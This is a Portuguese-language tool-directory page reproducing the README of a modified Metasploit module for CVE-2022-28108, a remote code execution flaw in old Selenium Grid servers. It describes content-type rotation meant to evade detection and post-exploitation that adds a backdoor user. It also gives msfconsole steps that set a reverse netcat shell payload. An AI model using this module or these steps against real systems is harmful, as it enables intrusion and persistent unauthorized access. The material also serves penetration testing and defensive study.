Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-28108 — Módulo Metasploit explorando CVE-2022-28108 no Selenium Grid para execução remota de código, com evasão de content-type e capacidades pós-exploração. | Kitploit
Ferramentas/GitHubGitHub/zeroethical/cve-2022-28108
Frameworks de ExploraçãoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebPós-ExploraçãoTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubzeroethical/cve-2022-28108

CVE-2022-28108

Módulo Metasploit explorando CVE-2022-28108 no Selenium Grid para execução remota de código, com evasão de content-type e capacidades pós-exploração.

15há 1 anoAinda não revisado
Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit de RCE no Selenium Chrome (Estendido)

Este repositório contém uma versão modificada de um módulo do Metasploit que explora uma vulnerabilidade de Execução Remota de Código em versões antigas do Selenium Server (Grid).

Por favor, leia este README cuidadosamente antes de usar este código.


Reconhecimento do Código Original:

Este módulo é baseado no excelente trabalho dos autores originais do módulo do Metasploit para o CVE-2022-28108. A funcionalidade principal de exploração da vulnerabilidade do Selenium Server permanece em grande parte baseada na implementação deles. Reconhecemos e apreciamos sua contribuição para a comunidade de segurança.

  • Módulo Metasploit Original: Você pode encontrar o módulo original dentro do Metasploit Framework.
  • Autores Originais: Os autores originais são creditados dentro do próprio módulo (normalmente na seção 'Author'). Consulte o módulo original para seus nomes específicos.

Vulnerabilidade Explorada:

Este módulo tem como alvo CVE-2022-28108, uma vulnerabilidade de Cross-Site Request Forgery (CSRF) no Selenium Server (Grid) em versões anteriores a 4.0.0-alpha-7. Esta vulnerabilidade surge porque o servidor permite tipos de conteúdo não JSON (como text/plain, application/x-www-form-urlencoded, e multipart/form-data) para certas requisições. Um atacante pode aproveitar isso para enviar requisições maliciosas, levando à Execução Remota de Código (RCE) no servidor.

Como o Código Original Funciona:

O módulo original do Metasploit explora esta vulnerabilidade enviando uma requisição POST manipulada para o endpoint /wd/hub/session do Selenium Server vulnerável. Esta requisição utiliza um Content-Type não JSON (especificamente text/plain) e inclui configurações maliciosas dentro do goog:chromeOptions das capacidades desejadas do navegador. Isso permite que um atacante especifique um binário arbitrário (como /usr/bin/python3) e argumentos a serem executados no servidor quando uma nova sessão de navegador for iniciada.

Modificações e Melhorias nesta Versão:

Este repositório contém uma versão modificada do módulo original do Metasploit. As principais modificações incluem:

  • Evasão de Content-Type: O módulo modificado tenta explorar a vulnerabilidade enviando a requisição maliciosa com múltiplos cabeçalhos Content-Type diferentes. Isso inclui text/plain, application/x-www-form-urlencoded, e multipart/form-data. Isso é feito para potencialmente contornar mecanismos básicos de filtragem ou detecção que possam estar procurando um Content-Type específico.
  • Função execute_post_exploitation: Uma nova função execute_post_exploitation(session_response) foi adicionada. Esta função é chamada após a exploração bem-sucedida e visa realizar tarefas básicas de pós-exploração. Na implementação atual, ela inclui:
    • Tentativa de adicionar um usuário backdoor ao sistema.
    • Coleta de informações básicas do sistema (nome de usuário, ID, versão do kernel).
  • Função execute_command_on_target: Outra nova função execute_command_on_target(command) foi adicionada. Esta função permite a execução de comandos arbitrários no sistema alvo após uma exploração bem-sucedida. Ela é usada dentro da função execute_post_exploitation e pode ser estendida para outras atividades de pós-exploração.

Principais Diferenças Destacadas:

A diferença central está no método exploit e na adição das duas novas funções.

  • Método exploit Original: Focado em enviar uma única requisição com Content-Type: text/plain.
  • Método exploit Modificado: Itera por diferentes valores de Content-Type, tentando a exploração com cada um. Após a exploração bem-sucedida, chama a função execute_post_exploitation.
  • Novas Funções: As funções execute_post_exploitation e execute_command_on_target são adições inteiramente novas nesta versão modificada, fornecendo capacidades estendidas de pós-exploração.

Como Usar o Módulo Modificado:

  1. Certifique-se de ter o Metasploit Framework instalado.
  2. Salve o código modificado: Salve o código Ruby fornecido como um arquivo .rb (por exemplo, selenium_rce_extended.rb).
  3. Coloque o módulo no diretório de módulos do Metasploit: Copie o arquivo salvo para o diretório apropriado de módulos do Metasploit. Geralmente está localizado em /usr/share/metasploit-framework/modules/exploits/ ou ~/.msf4/modules/exploits/. Consulte sua instalação do Metasploit para a localização exata.
  4. Inicie o Console do Metasploit: Abra um terminal e execute msfconsole.
  5. Carregue o módulo: No console do Metasploit, use o comando use exploit/selenium_rce_extended (ou o caminho onde você salvou o arquivo, se o colocou em um subdiretório).
  6. Configure o alvo: Defina o endereço IP e a porta do servidor Selenium vulnerável:
    msf6 exploit(selenium_rce_extended) > set RHOSTS <target_ip>
    msf6 exploit(selenium_rce_extended) > set RPORT <target_port>
    
    (A porta padrão para o Selenium Grid é geralmente 4444).
  7. Defina o payload: Escolha um payload para executar no sistema alvo. Por exemplo, para obter uma reverse shell:
    msf6 exploit(selenium_rce_extended) > set PAYLOAD cmd/unix/reverse_netcat
    msf6 exploit(selenium_rce_extended) > set LHOST <your_ip>
    msf6 exploit(selenium_rce_extended) > set LPORT <your_port>
    
  8. Execute o exploit: Execute o módulo com o comando exploit.

Considerações Importantes (Aviso Legal):

  • Use este código de forma responsável e ética. Este módulo é fornecido para fins educacionais e para profissionais de segurança testarem e avaliarem a segurança de seus sistemas.
  • Certifique-se de ter permissão explícita para testar contra o sistema alvo. O uso não autorizado deste código é ilegal e antiético.
  • Entenda os riscos envolvidos. Explorar vulnerabilidades pode ter consequências não intencionais e pode desestabilizar sistemas alvo.
  • Teste em ambientes isolados e controlados. Realize sempre os testes em ambientes onde você tenha controle total e possa mitigar qualquer dano potencial.
  • As funções de pós-exploração são exemplos básicos. Pode ser necessário modificá-las ou estendê-las com base em suas necessidades específicas e no ambiente alvo.

Isenção de Responsabilidade:

O(s) autor(es) deste código modificado não são responsáveis por qualquer uso indevido ou dano causado pelo uso deste módulo. Ao usar este código, você concorda em assumir total responsabilidade por suas ações.

Licença:

Este código modificado provavelmente está coberto pela mesma licença do Metasploit Framework original (normalmente a Licença MSF). Consulte a licença original do Metasploit Framework para obter detalhes.

Contribuindo:

Contribuições e melhorias para este módulo são bem-vindas. Sinta-se à vontade para enviar pull requests com correções de bugs, melhorias ou novos recursos.

Agradecimentos:

Reiteramos nossa gratidão aos autores originais do módulo do Metasploit para o CVE-2022-28108. O trabalho deles forma a base deste módulo modificado.

Baixar ferramenta